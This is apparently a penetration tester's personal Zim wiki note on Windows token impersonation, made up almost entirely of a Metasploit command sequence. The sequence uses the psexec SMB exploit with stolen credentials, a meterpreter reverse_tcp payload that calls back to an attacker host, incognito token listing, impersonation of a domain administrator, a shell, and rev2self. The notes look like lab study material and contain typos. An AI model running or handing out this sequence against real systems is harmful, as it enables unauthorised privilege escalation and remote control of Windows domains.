Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-11T05:48:24-04:00

====== impersonation token ======
Created Thursday 11 June 2020


cookies

====== 2 types ======

1.impersonate
2.delegant

* **msfconsole**
* **use exploit/windows/smb/psexec**
* **set rhost domain pass user**
* **set target 1/2/3   use 2 if u are confused**
* **set payload winddows/x64/meterpreter/reverse_tcp**
* **set lhost **
* **load  incognito {see different available options also}**
* **list_tokens -u     or -g for groups**
* **impersonate_token marvel\\administrator**
* **shell**


====== trick for msfconsole ======
**rev2self**


